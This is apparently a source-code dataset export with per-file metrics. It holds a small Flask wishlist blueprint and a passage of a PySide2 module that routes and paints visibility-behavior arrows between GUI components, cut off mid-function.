| 68.483871
| 0.270753
| 0.131182
| 0
| 0.647727
| 0
| 0.454545
| 0.729674
| 0.626936
| 0
| 0
| 0
| 0
| 0.079545
| 1
| 0.034091
| false
| 0
| 0.056818
| 0
| 0.102273
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
4b46cb26b7e487f51e592323ebeca529219ae64f
| 124
|
py
|
Python
|
webshop/myapp/bp_wishlist/__init__.py
|
grishian/groepswerk2
|
eff0305a99066466f6cafcf5572a0ea1f41f44ed
|
[
"MIT"
] | null | null | null |
webshop/myapp/bp_wishlist/__init__.py
|
grishian/groepswerk2
|
eff0305a99066466f6cafcf5572a0ea1f41f44ed
|
[
"MIT"
] | null | null | null |
webshop/myapp/bp_wishlist/__init__.py
|
grishian/groepswerk2
|
eff0305a99066466f6cafcf5572a0ea1f41f44ed
|
[
"MIT"
] | null | null | null |
from flask import Blueprint
bp_wishlist = Blueprint('bp_wishlist', __name__, cli_group="db")
from . import views_wishlist
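# Importing views_wishlist after the Blueprint is created is the usual Flask
# pattern for avoiding a circular import: views_wishlist presumably imports
# bp_wishlist in order to register its routes on it.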
| 20.666667
| 64
| 0.790323
| 17
| 124
| 5.294118
| 0.647059
| 0.244444
| 0.422222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.120968
| 124
| 5
| 65
| 24.8
| 0.825688
| 0
| 0
| 0
| 0
| 0
| 0.104839
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
29a7472a203512b1ed6a9091d103dd09e345ce90
| 102353
|
py
|
Python
|
src/graphics/tguim/visibilitybehaviorgraphics.py
|
facade-technologies-inc/facile
|
4c9134dced71734641fed605e152880cd9ddefe3
|
[
"MIT"
] | 2
|
2020-09-17T20:51:18.000Z
|
2020-11-03T15:58:10.000Z
|
src/graphics/tguim/visibilitybehaviorgraphics.py
|
facade-technologies-inc/facile
|
4c9134dced71734641fed605e152880cd9ddefe3
|
[
"MIT"
] | 97
|
2020-08-26T05:07:08.000Z
|
2022-03-28T16:01:49.000Z
|
src/graphics/tguim/visibilitybehaviorgraphics.py
|
facade-technologies-inc/facile
|
4c9134dced71734641fed605e152880cd9ddefe3
|
[
"MIT"
] | null | null | null |
"""
..
/------------------------------------------------------------------------------\
| -- FACADE TECHNOLOGIES INC. CONFIDENTIAL -- |
|------------------------------------------------------------------------------|
| |
| Copyright [2019] Facade Technologies Inc. |
| All Rights Reserved. |
| |
| NOTICE: All information contained herein is, and remains the property of |
| Facade Technologies Inc. and its suppliers if any. The intellectual |
| and technical concepts contained herein are proprietary to Facade |
| Technologies Inc. and its suppliers and may be covered by U.S. and Foreign |
| Patents, patents in process, and are protected by trade secret or copyright |
| law. Dissemination of this information or reproduction of this material is |
| strictly forbidden unless prior written permission is obtained from Facade |
| Technologies Inc. |
| |
\------------------------------------------------------------------------------/
This module contains the VBGraphics class.
"""
from copy import copy
from PySide2.QtCore import QRectF
from PySide2.QtGui import QPainterPath, QPainter, QPen, Qt, QColor, QBrush, QPainterPathStroker, QContextMenuEvent, \
QMouseEvent
from PySide2.QtWidgets import QGraphicsItem, QAbstractGraphicsShapeItem
import data.statemachine as sm
from qt_models.visibilitybehaviormenu import VisibilityBehaviorMenu
from gui.settriggeractiondialog import SetTriggerActionDialog
class VBGraphics(QAbstractGraphicsShapeItem):
MAX_LEFT_DIST = 140
MIN_LEFT_DIST = 20
ARROW_COL = QColor(230, 230, 230)
SEL_ARROW_COL = QColor(255, 200, 50)
HIDDEN_ARROW_COL = copy(ARROW_COL)
HIDDEN_ARROW_COL.setAlpha(round(ARROW_COL.alpha()/2))
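# HIDDEN_ARROW_COL is a half-opacity copy of ARROW_COL; paint() uses it when a
# connected component is hidden in the extra components section.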
def __init__(self, dataVisibilityBehavior: 'VisibilityBehavior', parent: 'TGUIMScene'):
"""
Construct the VBGraphics class.
'src' means the source component, the one triggering the vb.
'dest' means the destination component, the one receiving and affected by the vb.
:param dataVisibilityBehavior: the VisibilityBehavior data object backing this graphic
:type dataVisibilityBehavior: VisibilityBehavior
:param parent: The parent of the visibility behavior (This will always be the scene)
:type parent: TGUIMScene
:return: None
:rtype: NoneType
"""
QAbstractGraphicsShapeItem.__init__(self)
parent.addItem(self)
self._dataVB = dataVisibilityBehavior
self.setFlag(QGraphicsItem.ItemIsSelectable)
self._srcComp = self.scene().getGraphics(self._dataVB.getSrcComponent())
self._dstComp = self.scene().getGraphics(self._dataVB.getDestComponent())
self._boundingRect = None
self._path = None
self._compIsHidden = False # When path is built, if a connected component is hidden, this will be True
def onRemove():
tguim = sm.StateMachine.instance._project.getTargetGUIModel()
tguim.removeVisibilityBehavior(self._dataVB)
self.scene().removeItem(self)
sm.StateMachine.instance.view.ui.propertyEditorView.setModel(None)
def onSetTriggerAction():
dlg = SetTriggerActionDialog(self._dataVB)
dlg.exec_()
def focus():
self._zoomable = True
self.scene().views()[0].smoothFocus(self)
self.menu = VisibilityBehaviorMenu()
self.menu.onRemove(onRemove)
self.menu.onSetTrigger(onSetTriggerAction)
self.menu.onFocus(focus)
def boundingRect(self):
"""
This pure virtual function defines the outer bounds of the item as a rectangle.
:return: the bounding rectangle of the item
:rtype: QRectF
"""
if self._boundingRect:
return self._boundingRect
srcPos = self._srcComp.scenePos()
dstPos = self._dstComp.scenePos()
leftCornerX = min(srcPos.x(), dstPos.x())
leftCornerY = min(srcPos.y(), dstPos.y())
width = abs(srcPos.x() - dstPos.x())
height = abs(srcPos.y() - dstPos.y())
return QRectF(leftCornerX, leftCornerY, width, height)
def paint(self, painter: QPainter, option, widget):
"""
Paints the contents of the visibility behavior, overriding the parent's paint function.
Only renders the visibility behavior if the configuration variable showBehaviors is true.
:param painter: the QPainter object to draw with
:type painter: QPainter
:param option: provides style options for the item
:type option: QStyleOptionGraphicsItem
:param widget: the widget being painted on, or None
:type widget: QWidget
:return: None
:rtype: NoneType
"""
# Only draw visibility behaviors if "Show Visibility Behaviors" action is checked in the View drop down.
if sm.StateMachine.instance.configVars.showBehaviors:
pen = QPen()
if self.isSelected():
arrowColor = VBGraphics.SEL_ARROW_COL
pen.setStyle(Qt.DashDotLine)
else:
arrowColor = VBGraphics.ARROW_COL
if self._compIsHidden:
arrowColor = VBGraphics.HIDDEN_ARROW_COL
pen.setStyle(Qt.SolidLine)
pen.setColor(arrowColor)
pen.setJoinStyle(Qt.RoundJoin)
pen.setCapStyle(Qt.RoundCap)
pen.setWidth(3)
painter.setPen(pen)
# Path and Arrowhead
path, arrival, direction, pathBoundingRect = self.buildPath()
arrowHead, arrowHeadBoundingRect = self.buildArrowHead(arrival, direction)
brTLx = min(pathBoundingRect.topLeft().x(), arrowHeadBoundingRect.topLeft().x())
brTLy = min(pathBoundingRect.topLeft().y(), arrowHeadBoundingRect.topLeft().y())
brBLy = max(pathBoundingRect.bottomLeft().y(), arrowHeadBoundingRect.bottomLeft().y())
brTRx = max(pathBoundingRect.topRight().x(), arrowHeadBoundingRect.topRight().x())
brHeight = brBLy - brTLy
brWidth = brTRx - brTLx
margin = 100
self._boundingRect = QRectF(brTLx - margin, brTLy - margin, brWidth + margin * 2, brHeight + margin * 2)
# Either of these lines will fix the drawing issue
self.prepareGeometryChange()
# self.scene().setSceneRect(self.scene().itemsBoundingRect())
# Draw path
painter.drawPath(path)
# Draw Arrowhead
pen.setStyle(Qt.SolidLine)
painter.setPen(pen)
painter.drawPath(arrowHead)
painter.fillPath(arrowHead, QBrush(arrowColor))
def buildArrowHead(self, arrival, direction):
"""
Builds the path for the arrowhead.
:param arrival: x,y coordinate tuple of arrival point
:type arrival: tuple
:param direction: Direction of arrival - from top:0, left:1, right:2, bottom:3
:type direction: int
"""
x = arrival[0]
y = arrival[1]
# draw the arrow head
aSize = 4
if direction == 0: # Top
arrowHead = QPainterPath()
arrowHead.moveTo(x, y)
arrowHead.lineTo(x - aSize, y - aSize * 2)
arrowHead.lineTo(x + aSize, y - aSize * 2)
arrowHead.lineTo(x, y)
elif direction == 1: # Left
arrowHead = QPainterPath()
arrowHead.moveTo(x, y)
arrowHead.lineTo(x - aSize * 2, y - aSize)
arrowHead.lineTo(x - aSize * 2, y + aSize)
arrowHead.lineTo(x, y)
elif direction == 2: # Right
arrowHead = QPainterPath()
arrowHead.moveTo(x, y)
arrowHead.lineTo(x + aSize * 2, y - aSize)
arrowHead.lineTo(x + aSize * 2, y + aSize)
arrowHead.lineTo(x, y)
else: # Bottom
arrowHead = QPainterPath()
arrowHead.moveTo(x, y)
arrowHead.lineTo(x - aSize, y + aSize * 2)
arrowHead.lineTo(x + aSize, y + aSize * 2)
arrowHead.lineTo(x, y)
boundingRect = arrowHead.boundingRect()
return arrowHead, boundingRect
def buildPath(self) -> tuple:
"""
Makes a path from the source component to the destination component.
Follows this general pattern for both the src and dst sides, which are then connected by a line:
- If not in the extra components section:
- If in the same window, just follow a rectangular path from one component to the other.
- If the center is in the left sixth of the window, route the arrow directly out the left.
- Otherwise, if the center is in the top half of the window, route out the top of the window, then parallel to the window
until on the left side of the scene.
- Otherwise, out the bottom of the window, then parallel to the window until on the left of the scene.
- If in the extra components section:
- If hidden on the left, the arrow is routed past a certain point, then turns into the EC section, and turns
again toward the top-level window's end, appearing to go under it.
- If hidden on the right, the same situation, mirrored.
- If in the middle, the arrow follows parallel to the left side of the component, with a buffer.
Note: When using points, the first index is what point on the component: top:0, left:1, right:2, bottom:3
and the second index is the coordinate: x:0, y:1.
:return: the path, arrival coordinates, direction of arrival, and the path's bounding rect
:rtype: (QPainterPath, tuple(int, int), int, QRectF)
"""
# --- INITIALIZATION --- #
# Instantiate path
path = QPainterPath()
# Get the components
srcComp = self._srcComp
dstComp = self._dstComp
# Get the components' containing windows, their positional attributes as [x, y, width, height] list,
# and the EC Section width
srcWin = srcComp.getWindowGraphics()
dstWin = dstComp.getWindowGraphics()
srcWinRect = [srcWin.scenePos().x(), srcWin.scenePos().y(), srcWin.width(), srcWin.height()]
dstWinRect = [dstWin.scenePos().x(), dstWin.scenePos().y(), dstWin.width(), dstWin.height()]
if srcWin.getScrollableItem():
srcECSWidth = srcWin.getScrollableItem().rect().width()
else:
srcECSWidth = 0
if dstWin.getScrollableItem():
dstECSWidth = dstWin.getScrollableItem().rect().width()
else:
dstECSWidth = 0
# Find points to stem from/arrive to as [top, left, right, bottom] list of x,y coordinate tuples
srcPoints = [(srcComp.scenePos().x() + srcComp.width() / 2, srcComp.scenePos().y()),
(srcComp.scenePos().x(), srcComp.scenePos().y() + srcComp.height() / 2),
(srcComp.scenePos().x() + srcComp.width(), srcComp.scenePos().y() + srcComp.height() / 2),
(srcComp.scenePos().x() + srcComp.width() / 2, srcComp.scenePos().y() + srcComp.height())]
dstPoints = [(dstComp.scenePos().x() + dstComp.width() / 2, dstComp.scenePos().y()),
(dstComp.scenePos().x(), dstComp.scenePos().y() + dstComp.height() / 2),
(dstComp.scenePos().x() + dstComp.width(), dstComp.scenePos().y() + dstComp.height() / 2),
(dstComp.scenePos().x() + dstComp.width() / 2, dstComp.scenePos().y() + dstComp.height())]
# Get both of their center points
# NOTE: If src/dstPoints is changed, this needs to be changed
srcCompCenter = (srcPoints[0][0], srcPoints[1][1])
dstCompCenter = (dstPoints[0][0], dstPoints[1][1])
# ---------------------- #
# Catch if in EC Section, along with the Extra Comp itself
srcInECSection, srcEC = srcComp.isInECSection()
dstInECSection, dstEC = dstComp.isInECSection()
# --- Calculate Distances --- #
numWin = round(abs(srcWinRect[1] - dstWinRect[1]) / 700 - 1) # Number of windows between the two windows
srcDistProp = (srcCompCenter[0] - srcWinRect[0]) / srcWinRect[2] # distance from left of window as prop
dstDistProp = (dstCompCenter[0] - dstWinRect[0]) / dstWinRect[2]
vDistSrc = 10 + max(0, srcDistProp * 20) # Distance from top or bottom edges to make a turn to go to the left
vDistDst = 10 + max(0, dstDistProp * 20) # Distance from top or bottom edges to make a turn to go to the left
echDist = 20 # The x distance to pass before turning to go into EC Section
ecvDist = 50 # The height the VB goes to before going to hidden component
# sign = lambda a: (a > 0) - (a < 0) # gets the sign of a number
srcPadding = 20
dstPadding = 20
if srcInECSection: # The x distance from the side of an extra component to turn towards/away from it
prop = (srcPoints[2][1] - srcEC.scenePos().y()) / srcEC.height()
srcPadding = 10 + 20 * prop # min 10, max 30
vDistSrc *= (1 + prop / 4)
vDistSrc = min(vDistSrc, 49)
if dstInECSection: # The x distance from the side of an extra component to turn towards/away from it
prop = (dstPoints[2][1] - dstEC.scenePos().y()) / dstEC.height()
dstPadding = 10 + 20 * prop # min 10, max 30
vDistDst *= (1 + prop / 4)
vDistDst = min(vDistDst, 49)
# Distance from left of window (its x pos) to make a right-angle turn
if dstWinRect[1] != srcWinRect[1]: # Dst is below src
hDist = min(numWin * 15 + (srcDistProp + dstDistProp) * 10 + VBGraphics.MIN_LEFT_DIST,
VBGraphics.MAX_LEFT_DIST)
else: # Same window
hDist = VBGraphics.MIN_LEFT_DIST # Still assigned, but used in a different way
# --------------------------- #
# --- IN SAME WINDOW --- #
if srcWin is dstWin:
if not (srcInECSection or dstInECSection): # same window
# Destination is on left
if dstCompCenter[0] + hDist <= srcPoints[1][0] and dstPoints[2][0] < srcPoints[1][0] - hDist:
xDist = srcPoints[1][0] - dstPoints[2][0]
path.moveTo(srcPoints[1][0], srcPoints[1][1])
path.lineTo(srcPoints[1][0] - xDist / 2, srcPoints[1][1])
path.lineTo(srcPoints[1][0] - xDist / 2, dstPoints[2][1])
path.lineTo(dstPoints[2][0], dstPoints[2][1])
arrival = (dstPoints[2][0], dstPoints[2][1])
direction = 2
# Destination is generally to the left but closer than last condition
elif dstCompCenter[0] + hDist <= srcCompCenter[0]:
path.moveTo(srcPoints[1][0], srcPoints[1][1])
if dstCompCenter[1] < srcCompCenter[1]: # Dst above Src
if dstPoints[2][0] >= srcPoints[1][0] - hDist:
path.lineTo(dstPoints[3][0], srcPoints[1][1])
path.lineTo(dstPoints[3][0], dstPoints[3][1])
else:
path.lineTo(srcPoints[1][0] - hDist / 2, srcPoints[1][1])
path.lineTo(srcPoints[1][0] - hDist / 2, dstPoints[3][1] + hDist)
path.lineTo(dstPoints[3][0], dstPoints[3][1] + hDist)
path.lineTo(dstPoints[3][0], dstPoints[3][1])
arrival = (dstPoints[3][0], dstPoints[3][1])
direction = 3
else:
if dstPoints[2][0] >= srcPoints[1][0] - hDist:
path.lineTo(dstPoints[0][0], srcPoints[1][1])
path.lineTo(dstPoints[0][0], dstPoints[0][1])
else:
path.lineTo(srcPoints[1][0] - hDist / 2, srcPoints[1][1])
path.lineTo(srcPoints[1][0] - hDist / 2, dstPoints[0][1] - hDist)
path.lineTo(dstPoints[0][0], dstPoints[0][1] - hDist)
path.lineTo(dstPoints[0][0], dstPoints[0][1])
arrival = (dstPoints[0][0], dstPoints[0][1])
direction = 0
# Destination is pretty much vertically aligned
elif dstCompCenter[0] + hDist > srcCompCenter[0] > dstCompCenter[0] - hDist:
if dstCompCenter[1] < srcCompCenter[1]: # Dst above Src
yDist = srcPoints[0][1] - dstPoints[3][1]
path.moveTo(srcPoints[0][0], srcPoints[0][1])
path.lineTo(srcPoints[0][0], srcPoints[0][1] - yDist / 2)
path.lineTo(dstPoints[3][0], srcPoints[0][1] - yDist / 2)
path.lineTo(dstPoints[3][0], dstPoints[3][1])
arrival = (dstPoints[3][0], dstPoints[3][1])
direction = 3
else:
yDist = dstPoints[0][1] - srcPoints[3][1]
path.moveTo(srcPoints[3][0], srcPoints[3][1])
path.lineTo(srcPoints[3][0], srcPoints[3][1] + yDist / 2)
path.lineTo(dstPoints[0][0], srcPoints[3][1] + yDist / 2)
path.lineTo(dstPoints[0][0], dstPoints[0][1])
arrival = (dstPoints[0][0], dstPoints[0][1])
direction = 0
# Destination is generally to the right but closer than next condition
elif srcCompCenter[0] <= dstCompCenter[0] - hDist <= srcPoints[2][0] or \
dstPoints[1][0] < srcPoints[2][0] + hDist:
path.moveTo(srcPoints[2][0], srcPoints[2][1])
if dstCompCenter[1] < srcCompCenter[1]: # Dst above Src
if dstPoints[1][0] < srcPoints[2][0] + hDist:
path.lineTo(dstPoints[3][0], srcPoints[2][1])
path.lineTo(dstPoints[3][0], dstPoints[3][1])
else:
path.lineTo(srcPoints[2][0] + hDist / 2, srcPoints[2][1])
path.lineTo(srcPoints[2][0] + hDist / 2, dstPoints[3][1] + hDist)
path.lineTo(dstPoints[3][0], dstPoints[3][1] + hDist)
path.lineTo(dstPoints[3][0], dstPoints[3][1])
arrival = (dstPoints[3][0], dstPoints[3][1])
direction = 3
else:
if dstPoints[1][0] < srcPoints[2][0] + hDist:
path.lineTo(dstPoints[0][0], srcPoints[2][1])
path.lineTo(dstPoints[0][0], dstPoints[0][1])
else:
path.lineTo(srcPoints[2][0] + hDist / 2, srcPoints[2][1])
path.lineTo(srcPoints[2][0] + hDist / 2, dstPoints[0][1] - hDist)
path.lineTo(dstPoints[0][0], dstPoints[0][1] - hDist)
path.lineTo(dstPoints[0][0], dstPoints[0][1])
arrival = (dstPoints[0][0], dstPoints[0][1])
direction = 0
# Destination is on right
else:
xDist = dstPoints[1][0] - srcPoints[2][0]
path.moveTo(srcPoints[2][0], srcPoints[2][1])
path.lineTo(srcPoints[2][0] + xDist / 2, srcPoints[2][1])
path.lineTo(srcPoints[2][0] + xDist / 2, dstPoints[1][1])
path.lineTo(dstPoints[1][0], dstPoints[1][1])
arrival = (dstPoints[1][0], dstPoints[1][1])
direction = 1
elif srcInECSection and not dstInECSection:
vDist = max(vDistDst, vDistSrc)
ecEnterDist = echDist # The x distance to pass before turning to go into EC Section
ecHiddenHeight = ecvDist # The height the VB goes to before going to hidden component
leftPausePoint = srcWinRect[0] + srcWinRect[2] + ecEnterDist + 30 - srcPadding # 30 is max pad
compHiddenOnLeft = srcPoints[1][0] - srcPadding < leftPausePoint
compHiddenOnRight = srcPoints[1][0] - srcPadding > srcWinRect[0] + srcWinRect[2] + \
srcECSWidth - ecEnterDist
self._compIsHidden = compHiddenOnLeft or compHiddenOnRight
if compHiddenOnLeft:
if srcPoints[2][0] + srcPadding >= srcWinRect[0] + srcWinRect[2]:
# For smoother animation. Not hidden yet
bottom = srcPoints[3]
right = srcPoints[2]
left = srcPoints[1]
if left[0] > leftPausePoint:
path.moveTo(left[0], left[1])
path.lineTo(leftPausePoint, left[1])
path.lineTo(leftPausePoint, srcWinRect[1] + srcWinRect[3] + vDist)
elif right[0] > leftPausePoint:
path.moveTo(leftPausePoint, bottom[1])
path.lineTo(leftPausePoint, srcWinRect[1] + srcWinRect[3] + vDist)
elif right[0] + srcPadding > leftPausePoint:
path.moveTo(right[0], right[1])
path.lineTo(leftPausePoint, right[1])
path.lineTo(leftPausePoint, srcWinRect[1] + srcWinRect[3] + vDist)
elif right[0] + srcPadding > srcWinRect[0] + srcWinRect[2] + ecEnterDist:
path.moveTo(right[0], right[1])
path.lineTo(right[0] + srcPadding, right[1])
path.lineTo(right[0] + srcPadding, srcWinRect[1] + srcWinRect[3] + vDist)
elif right[0] > srcWinRect[0] + srcWinRect[2] + ecEnterDist:
path.moveTo(right[0], right[1])
path.lineTo(right[0] + srcPadding, right[1])
path.lineTo(right[0] + srcPadding, srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] + vDist)
else:
path.moveTo(srcWinRect[0] + srcWinRect[2], right[1])
path.lineTo(right[0] + srcPadding, right[1])
path.lineTo(right[0] + srcPadding, srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] + vDist)
else:
path.moveTo(srcWinRect[0] + srcWinRect[2],
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] + vDist)
elif compHiddenOnRight:
if srcPoints[1][0] < srcWinRect[0] + srcWinRect[2] + srcECSWidth: # Not hidden yet but close
left = srcPoints[1]
path.moveTo(left[0], left[1])
path.lineTo(left[0] - srcPadding, left[1])
path.lineTo(left[0] - srcPadding, srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
elif srcPoints[1][0] - srcPadding < srcWinRect[0] + srcWinRect[2] + srcECSWidth:
left = srcPoints[1]
path.moveTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth, left[1])
path.lineTo(left[0] - srcPadding, left[1])
path.lineTo(left[0] - srcPadding, srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
else:
path.moveTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth,
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth - ecEnterDist,
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth - ecEnterDist,
srcWinRect[1] + srcWinRect[3] + vDist)
else:
left = srcPoints[1]
path.moveTo(left[0], left[1])
path.lineTo(left[0] - srcPadding, left[1])
path.lineTo(left[0] - srcPadding, srcWinRect[1] + srcWinRect[3] + vDist)
path.lineTo(dstPoints[3][0], srcWinRect[1] + srcWinRect[3] + vDist)
path.lineTo(dstPoints[3][0], dstPoints[3][1])
arrival, direction = (dstPoints[3][0], dstPoints[3][1]), 3
elif dstInECSection and not srcInECSection:
vDist = max(vDistDst, vDistSrc)
path.moveTo(srcPoints[3][0], srcPoints[3][1])
path.lineTo(srcPoints[3][0], srcWinRect[1] + srcWinRect[3] + vDist)
ecEnterDist = echDist # The x distance to pass before turning to go into EC Section
ecHiddenHeight = ecvDist # The height the VB goes to before going to hidden component
leftPausePoint = dstWinRect[0] + dstWinRect[2] + ecEnterDist + 30 - dstPadding # 30 is max pad
compHiddenOnLeft = dstPoints[1][0] - dstPadding < leftPausePoint
compHiddenOnRight = dstPoints[1][0] - dstPadding > dstWinRect[0] + dstWinRect[2] + \
dstECSWidth - ecEnterDist
if compHiddenOnLeft:
if dstPoints[2][0] + dstPadding > dstWinRect[0] + dstWinRect[2]:
# For smoother animation. Not hidden yet
bottom = dstPoints[3]
right = dstPoints[2]
left = dstPoints[1]
if left[0] > leftPausePoint:
path.lineTo(leftPausePoint, dstWinRect[1] + dstWinRect[3] + vDist)
path.lineTo(leftPausePoint, left[1])
path.lineTo(left[0], left[1])
arrival = (left[0], left[1])
direction = 1
elif right[0] > leftPausePoint:
path.lineTo(leftPausePoint, dstWinRect[1] + dstWinRect[3] + vDist)
path.lineTo(leftPausePoint, bottom[1])
arrival = (leftPausePoint, bottom[1])
direction = 3
elif right[0] + dstPadding > leftPausePoint:
path.lineTo(leftPausePoint, dstWinRect[1] + dstWinRect[3] + vDist)
path.lineTo(leftPausePoint, right[1])
path.lineTo(right[0], right[1])
arrival = (right[0], right[1])
direction = 2
elif right[0] + dstPadding > dstWinRect[0] + dstWinRect[2] + ecEnterDist:
path.lineTo(right[0] + dstPadding, dstWinRect[1] + dstWinRect[3] + vDist)
path.lineTo(right[0] + dstPadding, right[1])
path.lineTo(right[0], right[1])
arrival = (right[0], right[1])
direction = 2
elif right[0] > dstWinRect[0] + dstWinRect[2] + ecEnterDist:
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] + vDist)
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(right[0] + dstPadding, dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(right[0] + dstPadding, right[1])
path.lineTo(right[0], right[1])
arrival = (right[0], right[1])
direction = 2
else:
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] + vDist)
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(right[0] + dstPadding, dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(right[0] + dstPadding, right[1])
path.lineTo(dstWinRect[0] + dstWinRect[2], right[1])
arrival = (dstWinRect[0] + dstWinRect[2], right[1])
direction = 2
else:
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] + vDist)
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(dstWinRect[0] + dstWinRect[2],
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
arrival = (dstWinRect[0] + dstWinRect[2], dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
direction = 2
elif compHiddenOnRight:
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth - ecEnterDist,
dstWinRect[1] + dstWinRect[3] + vDist)
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth - ecEnterDist,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
if dstPoints[1][0] < dstWinRect[0] + dstWinRect[2] + dstECSWidth: # Not hidden yet but close
left = dstPoints[1]
path.lineTo(left[0] - dstPadding, dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(left[0] - dstPadding, left[1])
path.lineTo(left[0], left[1])
arrival = (left[0], left[1])
direction = 1
elif dstPoints[1][0] - dstPadding < dstWinRect[0] + dstWinRect[2] + dstECSWidth:
left = dstPoints[1]
path.lineTo(left[0] - dstPadding, dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(left[0] - dstPadding, left[1])
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth, left[1])
arrival = (dstWinRect[0] + dstWinRect[2] + dstECSWidth, left[1])
direction = 1
else:
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
arrival = (dstWinRect[0] + dstWinRect[2] + dstECSWidth,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
direction = 1
else:
left = dstPoints[1]
path.lineTo(left[0] - dstPadding, dstWinRect[1] + dstWinRect[3] + vDist)
path.lineTo(left[0] - dstPadding, left[1])
path.lineTo(left[0], left[1])
arrival = (left[0], left[1])
direction = 1
else: # both in EC Section
vDist = max(vDistDst, vDistSrc)
ecEnterDist = echDist # The x distance to pass before turning to go into EC Section
ecHiddenHeight = ecvDist # The height the VB goes to before going to hidden component
leftPausePoint = srcWinRect[0] + srcWinRect[2] + ecEnterDist + 30 - srcPadding # 30 is max pad
compHiddenOnLeft = srcPoints[1][0] - srcPadding < leftPausePoint
compHiddenOnRight = srcPoints[1][0] - srcPadding > srcWinRect[0] + srcWinRect[2] + \
srcECSWidth - ecEnterDist
if compHiddenOnLeft:
if srcPoints[2][0] + srcPadding > srcWinRect[0] + srcWinRect[2]:
# For smoother animation. Not hidden yet
bottom = srcPoints[3]
right = srcPoints[2]
left = srcPoints[1]
if left[0] > leftPausePoint:
path.moveTo(left[0], left[1])
path.lineTo(leftPausePoint, left[1])
path.lineTo(leftPausePoint, srcWinRect[1] + srcWinRect[3] + vDist)
elif right[0] > leftPausePoint:
path.moveTo(leftPausePoint, bottom[1])
path.lineTo(leftPausePoint, srcWinRect[1] + srcWinRect[3] + vDist)
elif right[0] + srcPadding > leftPausePoint:
path.moveTo(right[0], right[1])
path.lineTo(leftPausePoint, right[1])
path.lineTo(leftPausePoint, srcWinRect[1] + srcWinRect[3] + vDist)
elif right[0] + srcPadding > srcWinRect[0] + srcWinRect[2] + ecEnterDist:
path.moveTo(right[0], right[1])
path.lineTo(right[0] + srcPadding, right[1])
path.lineTo(right[0] + srcPadding, srcWinRect[1] + srcWinRect[3] + vDist)
elif right[0] > srcWinRect[0] + srcWinRect[2] + ecEnterDist:
path.moveTo(right[0], right[1])
path.lineTo(right[0] + srcPadding, right[1])
path.lineTo(right[0] + srcPadding, srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] + vDist)
else:
path.moveTo(srcWinRect[0] + srcWinRect[2], right[1])
path.lineTo(right[0] + srcPadding, right[1])
path.lineTo(right[0] + srcPadding, srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
